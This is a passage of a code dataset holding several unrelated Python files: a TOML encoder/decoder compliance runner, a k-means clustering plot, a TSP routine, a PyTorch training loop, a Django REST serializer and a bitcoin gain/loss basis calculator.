cause=error)\n\n try:\n validate_json(loaded)\n except JSONValidationError as error:\n # Note that we're passing the error as 'details' here, since we want the string\n # representation (which gets formatted correctly).\n raise Failed(f\"Got incorrect JSON from {source}\", error=error)\n\n\n# --------------------------------------------------------------------------------------\n# Actual Compliance Checks\n# --------------------------------------------------------------------------------------\ndef test_decoder(toml_file, json_file, clean_exit, decoder):\n content = run_program(decoder, stdin=toml_file.read_bytes(), clean_exit=clean_exit)\n\n # For valid Test Cases\n correct_json = load_json(content=json_file.read_text(), source=\"test case input\")\n decoded_json = load_json(content=content, source=\"decoder's output\")\n\n if correct_json != decoded_json:\n raise Failed(\n \"Mismatch between expected JSON and decoded JSON.\",\n diff=(correct_json, decoded_json),\n )\n\n\ndef test_encoder(json_file, clean_exit, encoder, decoder):\n input_json = load_json(content=json_file.read_text(), source=\"test case input\")\n\n # Encode the input.\n result = run_program(encoder, stdin=json_file.read_bytes(), clean_exit=clean_exit)\n\n # Decode the result.\n decoded = run_program(decoder, stdin=result, clean_exit=True)\n\n # Check round-trip was same as original\n round_trip_json = load_json(content=decoded, source=\"decoder's output\")\n\n if input_json != round_trip_json:\n raise Failed(\n \"Mismatch between original JSON and encoded-decoded JSON.\",\n diff=(input_json, round_trip_json),\n )\n\n\n# --------------------------------------------------------------------------------------\n# Check Runners!\n# --------------------------------------------------------------------------------------\ndef _show_summary(counts):\n total = sum(counts.values())\n if total == 0:\n print(colored(\"Deselected all tests!\", fg=\"red\"))\n return\n\n n_passed = colored(\n f\"{counts['pass']} passed\", fg=\"green\" if counts[\"pass\"] else \"red\"\n )\n n_total = f\"{total} total\"\n\n print()\n print(\"Summary: \", n_passed, \", \", n_total, sep=\"\")\n\n\ndef _show_pass(name):\n print(colored(\" PASS \", fg=\"grey\", bg=\"green\"), end=\" \")\n print(colored(name, fg=\"cyan\"))\n\n\ndef _show_fail(name, failed):\n print(colored(\" FAIL \", fg=\"grey\", bg=\"red\"), end=\" \")\n print(colored(name, fg=\"cyan\"))\n\n reason = textwrap.indent(failed.reason, \" \")\n print(colored(reason, fg=\"red\"))\n if failed.details:\n print(textwrap.indent(str(failed.details), \" \"))\n\n\n# Those messy functions above, keeps this function clean.\ndef run_with_reporting(function, checks):\n counts = {\"fail\": 0, \"pass\": 0}\n\n for name, kwargs in checks:\n try:\n function(**kwargs)\n except Failed as e:\n _show_fail(name, e)\n counts[\"fail\"] += 1\n else:\n _show_pass(name)\n counts[\"pass\"] += 1\n\n _show_summary(counts)\n\n # This will be the program's exit code\n if counts[\"fail\"] or sum(counts.values()) == 0:\n return 1\n return 0\n\n\ndef encoder_compliance(encoder, decoder, markers):\n def generate_parameters():\n for toml_file, json_file in get_test_pairs(markers):\n if json_file is None: # need something to encode!\n continue\n yield (\n json_file,\n {\n \"json_file\": json_file,\n \"clean_exit\": toml_file is not None,\n \"encoder\": encoder,\n \"decoder\": decoder,\n },\n )\n\n ensure_executable(encoder)\n ensure_executable(decoder)\n\n return run_with_reporting(test_encoder, generate_parameters())\n\n\ndef decoder_compliance(decoder, markers):\n def generate_parameters():\n for toml_file, json_file in get_test_pairs(markers):\n if toml_file is None: # need something to decode!\n continue\n yield (\n toml_file,\n {\n \"toml_file\": toml_file,\n \"clean_exit\": json_file is not None,\n \"json_file\": json_file,\n \"decoder\": decoder,\n },\n )\n\n ensure_executable(decoder)\n return run_with_reporting(test_decoder, generate_parameters())\n\n\n# --------------------------------------------------------------------------------------\n# CLI argument handling\n# --------------------------------------------------------------------------------------\ndef get_parser():\n parser = argparse.ArgumentParser(prog=\"toml-compliance/run.py\", allow_abbrev=False)\n subparsers = parser.add_subparsers(title=\"commands\")\n\n encoder = subparsers.add_parser(\"encoder\")\n encoder.add_argument(\"target\", action=\"store\", help=\"Encoder to test\")\n encoder.add_argument(\n \"--decoder\",\n action=\"store\",\n help=\"Supporting decoder for testing\",\n required=True,\n )\n encoder.add_argument(\n \"-m\",\n metavar=\"MARKER\",\n dest=\"markers\",\n help=\"Only run tests that match given marker. Can be specified multiple times.\",\n nargs=1,\n )\n\n decoder = subparsers.add_parser(\"decoder\")\n decoder.add_argument(\"target\", action=\"store\", help=\"Encoder to test\")\n decoder.add_argument(\n \"-m\",\n metavar=\"MARKER\",\n dest=\"markers\",\n help=\"Only run tests that match given marker. Can be specified multiple times.\",\n nargs=1,\n )\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n\n if \"target\" not in args:\n parser.print_help()\n sys.exit(1)\n\n # This check isn't super clear at first glance. It works since the 'decoder'\n # subparser does not have a 'decoder' argument.\n should_run_encoder_tests = \"decoder\" in args\n\n if should_run_encoder_tests:\n exit_code = encoder_compliance(args.target, args.decoder, args.markers)\n else:\n exit_code = decoder_compliance(args.target, args.markers)\n\n sys.exit(exit_code)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"436177286","text":"from sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#setup values\ndata = pd.read_csv('nci1.csv')\nnumber_of_rows = len(data.index)\nnumber_of_clusters = 5\ncolor_map = []\ncolor_set = ['red','blue','yellow','green','orange','purple']\n\n#Cluster Algorithm\nkmeans = KMeans(n_clusters=number_of_clusters, random_state=0).fit(data.drop(['type'], axis= 1))\nk_cluster = kmeans.labels_\n\n\n\n#set up color map based on cluster\nfor row in range(0,number_of_rows):\n color_map.append(color_set[k_cluster[row]])\n\n\n#Visulization (PCA Algorithm)\npca_3d = PCA(n_components=3)\nPCs_3d = pd.DataFrame(pca_3d.fit_transform(data.drop(['type'], axis= 1)))\n\n#Visualization (t-SNE Algorithm)\ntsne_2d = TSNE(n_components=2, perplexity=3)\nTCs_2d = pd.DataFrame(tsne_2d.fit_transform(data.drop(['type'], axis= 1)))\n\n\n#ax = plt.axes(projection =\"3d\")\n#ax.scatter3D(PCs_3d.loc[:,0],PCs_3d.loc[:,1],PCs_3d.loc[:,2], color = color_map)\nplt.scatter(PCs_3d.loc[:,0],PCs_3d.loc[:,1],c = color_map)\n\n#bx = plt.axes(projection =\"3d\")\n#bx.scatter3D(TCs_3d.loc[:,0],TCs_3d.loc[:,1], TCs_3d.loc[:,2], color = color_map)\n#plt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map)\n\n\nplt.title('PCA Dimension-Representation of Kmeans Clustering')\nplt.show()","sub_path":"Past Files/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"107790201","text":"import sys;sys.stdin=open('input2.txt','r')\n\n\ndef tsp(now, next): # now=현재, next=다음\n ret = dp[now][next]\n res = float('INF')\n if next == all: # 만약 마지막 고객까지 끝냈으면 \n return dist[now][N+1] # 그 고객에서부터 집가지의 거리를 반환\n if ret != 0: # 이미 방문했다면 넘어간다\n return ret\n for i in range(1, N+1): # 1번 고객부터 N번 고객까지. \n if next&(1<', max=nIters)\n\n\n #print(\"aaaaaaaaaaaaaaaaa\")\n\n for i, (input, target3D, meta) in enumerate(dataLoader):\n #print(input.size())\n input_var = torch.autograd.Variable(input).float().cuda()\n# target3D_var = torch.autograd.Variable(target3D).float().cuda()\n target3D_var = torch.autograd.Variable(meta).float().cuda()\n\n\n # print(target3D_var)\n\n output = model(input_var)\n# reg = output[opt.nStack]\n\n optimizer.zero_grad()\n loss = mean_squared_error(output, target3D_var)\n loss.backward()\n optimizer.step()\n\n #print(i)\n\n\n\n Loss.update(loss, input.size(0))\n #Acc.update(Accuracy((output.data).cpu().numpy(), (target3D_var.data).cpu().numpy()))\n\n #Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {loss.avg:.6f} | Loss3D {loss3d.avg:.6f} | Acc {Acc.avg:.6f} | Mpjpe {Mpjpe.avg:.6f} ({Mpjpe.val:.6f})'.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, loss=Loss, Acc=Acc, split = split, Mpjpe=Mpjpe, loss3d = Loss3D)\n Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {lossa:} '.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, lossa = Loss.avg, split=split)\n #print(Loss.avg)\n bar.next()\n bar.finish()\n\n if i%500 == 0:\n _checkpoint( model, optimizer)\n\n return Loss.avg #, Acc.avg, Mpjpe.avg, Loss3D.avg\n\n\ndef train(epoch, opt, train_loader, model, criterion, optimizer):\n return step('train', epoch, opt, train_loader, model, criterion, optimizer)\n\ndef val(epoch, opt, val_loader, model, criterion):\n return step('val', epoch, opt, val_loader, model, criterion)\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"385945120","text":"from rest_framework import serializers\nfrom .models import *\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ('username','password')\n\n\nclass UserprofileSerializer(serializers.ModelSerializer):\n user = UserSerializer()\n\n class Meta:\n model = Userprofile\n fields = ('user','tel','type','nickname','headportrait')\n\n def to_representation(self, instance):\n ret = super(UserprofileSerializer,self).to_representation(instance)\n ret.pop('user')\n ret['username'] = instance.user.username\n return ret\n\n def create(self,validated_data):\n user = validated_data.pop('user')\n user = User.objects.create_user(**user)\n userprofile = Userprofile.objects.create(user=user,**validated_data)\n return userprofile\n\n def update(self, instance, validated_data):\n if validated_data.get('user'):\n instance.user.__dict__.update(**validated_data)\n userprofile = instance.__dict__.update(**validated_data)\n return userprofile\n","sub_path":"backend/fangdiaocenter/fangdiaocenter/user/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"520393217","text":"# program to calculate the gain or loss on bitcoin transactions\r\n# one line of text as header followed by columns of data\r\n# Data file date, +/-coin number, cost$\r\n# 20190402,0.050,205\r\n\r\nimport csv\r\nimport sys\r\nimport os\r\nfrom datetime import date\r\nfrom decimal import *\r\n\r\n\r\ndatafile = \"test.txt\"\r\nwritefile = \"test.csv\"\r\n\r\nPrecision = 8 # number of decimal places in the data\r\n\r\n\r\n\r\ndef SortData():\r\n# separate data into 2 strings\r\n# one with sales and one with buys\r\n\r\n Buy = \"\"\r\n Sell = \"\"\r\n BuyCnt = 0\r\n SellCnt = 0\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n for line in reader:\r\n a1 = line[1]\r\n if a1[0] == '-':\r\n SellCnt += 1\r\n Sell = Sell + str(SellCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\r\n else:\r\n BuyCnt += 1\t\t\r\n Buy = Buy + str(BuyCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\t\r\n\r\n# sort the Buy and Sell strings into descending order by index numbers\r\n# assume the datafile is in chronologic order and you want to use FIFO accounting\r\n# the data would be rearanged from a chronologic order\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\t\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Buy = Temp \t\r\n\t\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','w') as f2:\r\n Temp = \"\"\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Sell = Temp \t\r\n\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','a') as f2:\r\n Temp = \"\"\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n\t\r\n\t\r\n\t\r\nprint(\"\\n\\nBasis-Profit Calculator\")\r\nprint(\"Ed Jordan, 14 Feb 2018\")\r\n\r\nsortFlag = \"\"\r\na = \"\"\r\na2 = \"\"\r\nb = len(sys.argv)\r\nif b > 1:\r\n for c in range(b): \r\n a2 = sys.argv[c]\r\n print(a2)\r\n if a2[0] != '-':\r\n a = a2\r\n\t\t\t\r\n if ((a2 == '-h') or (a2 == '--help') or (a2 == '-H')):\r\n print(\"Data should have one line of buys before the first sale. It can have a line of headers at the top.\")\r\n print(\"Data file needs 3 columns. These are separated by commas or tabs.\")\r\n print(\"Program uses last-in to first-out, LIFO, basis accounting\\n\")\r\n print(\"Data should be in chronological order with buys first before sales.\")\r\n print(\"An 'index out of range' error probably is related to the data file format. \")\r\n print(\"Parameters:\\n -h or --help: help\\n first parameter: datafile name\\nFirstIn-FirstOut: -F\")\r\n print(\"python B2018.py datafile.txt -F\")\r\n print(\"See the README file.\")\r\n sys.exit(1)\r\n\r\n if ((a2 == '-F') or (a2 == '-f')):\r\n sortFlag = \"F\"\r\n\t\t\t\r\nif a != '': \r\n dfile = ''\r\n for s in range(0,len(a)):\r\n if a[s] == '.':\r\n break\r\n dfile = dfile + a[s]\r\n\r\n datafile = dfile + '.txt'\r\n writefile = dfile + '.csv'\r\n print(datafile)\r\n\r\nwith open(datafile,'r') as f1:\r\n with open('work.tmp','w') as f2:\r\n for line in f1:\r\n msg = \"\"\r\n flag = 0\r\n for s in range(0,len(line)):\r\n a = line[s]\r\n if line[0] == '\\n':\r\n break \r\n if a == chr(9):\r\n a = ','\r\n msg = msg + a\r\n elif ((a == ',') and (flag == 1)):\r\n continue\r\n elif a == '$':\r\n flag = 1\r\n continue\r\n elif ((a == ',') and (flag == 1)):\r\n continue\r\n elif a == ' ':\r\n continue\r\n else:\r\n msg = msg + a\r\n \r\n f2.write(msg) \r\n f2.close\r\n\r\n\t\r\nif sortFlag == 'F':\r\n print(\"Option -F\")\r\n SortData() \r\n\r\n\r\n\t\r\ndef GetDecimal(n3): # each piece of data should have the correct number of decimals\r\n cnt = 0\r\n for s in range(0,len(n3)):\r\n a = n3[s]\r\n cnt = cnt + 1\r\n if a == '.':\r\n cnt = 0\r\n \r\n return cnt\r\n\t\r\n\t\r\ndef AdjFlag(n1,n2,Prec):\r\n flag=0\t\t\r\n \r\n# 3 outcomes for addition of sold coins with bought coins\r\n# negative - more sold than bought\r\n# positive - fewer sold than bought\r\n# zero - equal number sold and bought $flag 0, 1, or 2\r\n\r\n a = \"0.\"\r\n for s in range(0,Prec):\r\n a = a + \"0\"\r\n\t\t\r\n a = a + \"5\"\r\n a = Decimal(a)\t\r\n pr1 = float(n1)\r\n pr2 = float(n2) \r\n\t\r\n if pr1 < a: # decimal point + 1 ?\r\n pr1 = 0\r\n if pr2 < a:\r\n pr2 = 0\r\n \r\n pr3 = pr1 - pr2\r\n\r\n if pr3 == 0:\r\n flag = 0\r\n if pr3 > 0:\r\n flag = 2\r\n if pr3 < 0:\r\n flag = 1\r\n\r\n# if the flag is zero. The amounts of the coins are equal\r\n# the price of the bought coins == the basis of the sold coins\r\n# both the bought coin row and the sold coin row can be deleted\r\n# from the data file\r\n\r\n return flag\r\n\r\ndef findRecordIndex():\r\n inx = 1\t\t\t\t\t# starting record\r\n try:\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt = 0\r\n for line in reader:\r\n cnt=cnt+1\r\n n1 = line[1]\r\n if n1[0] == '-':\r\n inx = cnt\r\n break\r\n f1.close\r\n inx = inx -1\r\n except IndexError:\r\n inx = 0\r\n return inx\r\n\r\ndef findListA(inx):\r\n dataLista = \"\"\r\n f1 = open('work.tmp', 'r')\r\n cnt = 1\r\n c1 = \"\"\r\n for line in f1: \r\n c1 = c1 + str(line) \r\n cnt = cnt + 1 \r\n if cnt == inx:\r\n f1.close\r\n break\r\n \r\n dataLista = c1\r\n return dataLista\r\n\r\ndef findListB(inx):\r\n dataListb =\"\"\r\n inx = inx +2\r\n f1 = open('work.tmp', 'r')\r\n cnt = 0\r\n c1 = \"\"\r\n for line in f1:\r\n cnt = cnt +1 \r\n if cnt >= inx:\r\n c1 = c1 + str(line) \r\n \r\n f1.close\r\n dataListb = c1\r\n return dataListb\r\n\r\ndef saveData(html):\r\n csv.register_dialect('escaped', delimiter = ' ', escapechar=\"\\\\\", quoting=csv.QUOTE_NONE)\r\n with open(writefile, 'a', newline='') as f1:\r\n linewriter = csv.writer(f1, dialect='escaped')\r\n linewriter.writerow(html)\r\n f1.close\r\n return\r\n\r\ndef writeData(dataLista, html, dataListb):\r\n f1 = open('work.tmp','w')\r\n f1.write(dataLista)\r\n f1.write(html)\r\n f1.write(dataListb)\r\n f1.close\r\n return\r\n\r\ndef makePositive(x): # string x is returned positive\r\n c = x\r\n a = \"\"\r\n for b in range(len(c)):\r\n if c[b] != '-':\r\n a = a + c[b]\r\n return a\r\n\r\ndef adjLength(x,y): # limit string to 2 decimal digits for currency.\r\n # y is the number of digits after the decimal point\r\n cnt=0\r\n a = \"\"\r\n e = \"\"\r\n c = \"\"\r\n d = 0\r\n flag = 0 # flag for the decimal point\r\n flag2 = 0 # flag for a leading zero in e\r\n for b in range(len(x)):\r\n f = x[b]\r\n if flag == 1:\r\n cnt = cnt + 1\r\n if cnt > y:\r\n d = int(f)\r\n break\r\n e = e+f\r\n if f == '.':\r\n flag = 1\r\n if flag == 0:\r\n c = c + f\r\n\t\t\t\t\t\r\n if d > 4: \r\n flag=0\r\n cnt = 0\r\n\r\n for b in range(len(e)):\r\n if e[b] != \"0\":\r\n flag = 1\r\n if e[b] == \"0\":\r\n if flag == 0:\r\n flag2 = flag2+1 # count leading zeros\r\n else:\r\n cnt = cnt+1 # digits after leading 0\r\n\r\n# int drops all leading zeros\r\n# if e is all 9s - they become zeros and c is incremented\r\n# if e is all 0s - it becomes 1 and we drop one leading 0\r\n# if e after the leading zeros is all 9s we also drop 1 0\r\n\r\n pr = \"\"\r\n pr1= \"\"\r\n if cnt > 0:\r\n for b in range(cnt):\r\n pr = pr + \"9\"\r\n pr1 = pr1 + \"0\"\r\n \r\n pr = int(pr)\r\n e = int(e)\r\n \r\n if e == pr:\r\n if cnt < y:\r\n e = \"1\"+pr1\r\n flag2 = flag2 -1\r\n if cnt == y:\r\n e = pr1\r\n c = int(c)\r\n c = c + 1\r\n c = str(c)\r\n else:\r\n e = e + 1\r\n e = str(e)\r\n for b in range(flag2):\r\n e = '0'+e\r\n\r\n if cnt == 0:\r\n e = 1\r\n flag2 = flag2-1\r\n e = str(e)\r\n if flag2 > 0: # add leading zeros\r\n e = str(e)\r\n for b in range(flag2):\r\n e = \"0\"+e\r\n\r\n a = c +\".\"+e \r\n n = y - len(e)\r\n\t\r\n if n > 0:\r\n for b in range(n):\r\n a = a + \"0\"\t\t# add trailing zeros\r\n \r\n return a \r\n \r\ndef adjValue(x): # adj value of digital x and make string\r\n if x == 0:\r\n a = \"0.00\"\r\n else:\r\n a = str(x) \r\n\r\n return a \r\n\r\n# Save work.tmp first to the spreadsheet. This followed by the program output\t\r\nmsg = \"\"\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n\t\r\n# write first row of the spreadsheet\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = \"saleDate,number,cost,unitPrice,proceeds,buyDate,profit,gain\"\r\nsaveData(msg)\r\n\r\n# d1 is the date of the purchase\r\n# d2 is the date of the sale\r\n# gain is the long or short term nature of the sale\r\n# p1 is the price of the purchased coins\r\n# p2 is the price of the sale of coins and it is negative\r\n# p3 is the price per coin in dollars purchased\r\n# p4 is the price per coin in dollars sold\r\n# n1 is the number of coins bought\r\n# n2 is the number of coins sold.\r\n\r\n\r\ninx = 1\r\nwhile inx > 0:\r\n \r\n d1=\"\"\r\n d2=\"\"\r\n n1=\"\"\r\n n2=\"\"\r\n p1=\"\"\r\n p2=\"\"\r\n p3=\"\"\r\n p4=\"\"\r\n\r\n cnt2 = 0\r\n flag = 0\r\n dataListA = \"\"\r\n dataListB = \"\"\r\n\r\n inx = findRecordIndex() \r\n if inx < 1:\r\n break\r\n \r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt=0\r\n \r\n for line in reader:\r\n cnt=cnt+1\r\n if cnt == inx:\r\n d1 = line[0]\r\n n1 = line[1]\r\n p1 = line[2]\r\n if cnt == inx+1:\r\n d2 = line[0]\r\n n2 = line[1]\r\n p2 = line[2]\r\n break\r\n f1.close\r\n\t\t\r\n Precision = GetDecimal(n1) # set decimal number based on data \r\n p1 = makePositive(p1)\r\n p2 = makePositive(p2) \r\n n1 = makePositive(n1)\r\n n2 = makePositive(n2)\r\n\t\r\n yr1 = d1[0]+d1[1]+d1[2]+d1[3] \r\n yr2 = d2[0]+d2[1]+d2[2]+d2[3] \r\n if d1[4] == 0:\r\n mo1 = d1[5] \r\n else:\r\n mo1 = d1[4] + d1[5]\r\n if d1[6] == 0:\r\n da1 = d1[7]\r\n else:\r\n da1 = d1[6] + d1[7] \r\n if d2[4] == 0:\r\n mo2 = d2[5] \r\n else:\r\n mo2 = d2[4] + d2[5]\r\n if d2[6] == 0:\r\n da2 = d2[7]\r\n else:\r\n da2 = d2[6] + d2[7]\r\n\r\n yr1 = int(yr1)\r\n mo1 = int(mo1)\r\n da1 = int(da1)\r\n yr2 = int(yr2)\r\n mo2 = int(mo2)\r\n da2 = int(da2) \r\n\r\n date1 = date(yr1,mo1,da1)\r\n date2 = date(yr2,mo2,da2)\r\n date3 = abs(date2-date1)\r\n date3 = date3.days\r\n if date3 > 365:\r\n gain = \"L\"\r\n else:\r\n gain = \"S\"\r\n\r\n# the basis for the sale is the share of the coins purchased\r\n# is #sold/#bought x price of the whole purchase\t\r\n \r\n p1 = Decimal(p1) # cost of purchase\r\n p2 = Decimal(p2) # proceeds of sale \r\n n2 = Decimal(n2) # number sold\r\n n1 = Decimal(n1) # number bought\r\n p3 = Decimal(p1/n1) # price per coin bought\r\n p4 = Decimal(p2/n2) # price per coin sold\r\n p4 = float(p4)\r\n p4 = Decimal(p4)\r\n p3 = float(p3)\r\n p3 = Decimal(p3)\r\n\t\r\n basis = p3*n2 \r\n profit = p2 - basis\r\n\t\r\n basis = adjValue(basis)\r\n basis = adjLength(basis,2)\r\n basis = Decimal(basis)\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n profit = Decimal(profit)\r\n\t\t\r\n\t\t\r\n# the price obtained for the coins sold minus the basis = gain/loss p2 = proceeds of sale\r\n# remaining coins unsold are n1 - n2 \r\n# the price per coin purchased does not change. p3 and p4 don't change\r\n\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n newNumCoins = n1-n2\r\n newBasis = newNumCoins*p3\r\n newBasis = adjValue(newBasis)\r\n newNumCoins = str(newNumCoins)\r\n basis = adjValue(basis)\r\n\r\n newBasis = adjLength(newBasis,2)\r\n\r\n profit = adjLength(profit,2)\r\n newNumCoins = adjLength(newNumCoins,Precision)\r\n \r\n flag = AdjFlag(n1,n2, Precision)\r\n \r\n dataListA = findListA(inx)\r\n dataListB = findListB(inx)\r\n\r\n if flag == 0: # equal number sold and bought\r\n n2 = str(n2)\r\n p3 = adjValue(p3)\r\n p3 = adjLength(p3,2)\r\n n2 = adjLength(n2,Precision)\r\n p1 = adjValue(p1)\r\n p2 = adjValue(p2)\r\n p1 = adjLength(p1,2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"\r\n msg = msg+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\r\n saveData(msg)\r\n msg = '\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\r\n if flag == 2: # fewer number sold than bought\r\n n2 = str(n2)\r\n profit = str(profit)\r\n n2 = adjLength(n2,Precision)\r\n p2 = adjValue(p2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\t\r\n saveData(msg)\r\n msg = d1+','+newNumCoins+','+newBasis+'\\n'\r\n\r\n writeData(dataListA,msg,dataListB)\r\n \r\n if flag == 1: # greater number sold than bought - carry some over unsold coins to the next sale\r\n # n1 becomes the number sold and the proceeds are n1*p4 for sale proceeds\r\n\t\t # p1 is the basis of the sold coins \r\n \r\n nn1 = n2 - n1\r\n newBasis = nn1*p4\r\n np2 = n1*p4\r\n nn1 = str(nn1)\r\n nn1 = makePositive(nn1)\r\n nn1 = adjLength(nn1,Precision)\r\n profit = np2-p1 \r\n np2 = adjValue(np2)\r\n np2 = adjLength(np2,2)\r\n p1 = adjValue(p1)\r\n p1 = adjLength(p1,2)\r\n n1 = str(n1) \r\n n1 = adjLength(n1,Precision) \r\n p2 = str(p2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n profit=adjValue(profit)\r\n profit=adjLength(profit,2)\r\n newBasis = adjValue(newBasis)\r\n newBasis=adjLength(newBasis,2)\r\n msg = d2+\",-\"+n1+\",\"+p1+\",\"+p4+\",\"+np2+\",\"+d1+\",\"\r\n msg = msg +profit+\",\"+gain \r\n saveData(msg)\r\n \r\n msg = d2+',-'+nn1+',-'+newBasis+'\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\t\t\r\n\r\n\t\t\r\n# add the work.tmp residual file to the spreadsheet\r\n# then delete the work.tmp file\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = 'Residual,Unsold,Items'\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n \r\n\t\t\r\nos.remove('work.tmp')\r\n\r\nprint('done')\r\nsys.exit(0)\r\n","sub_path":"B2019b.py","file_name":"B2019b.py","file_ext":"py","file_size_in_byte":19054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
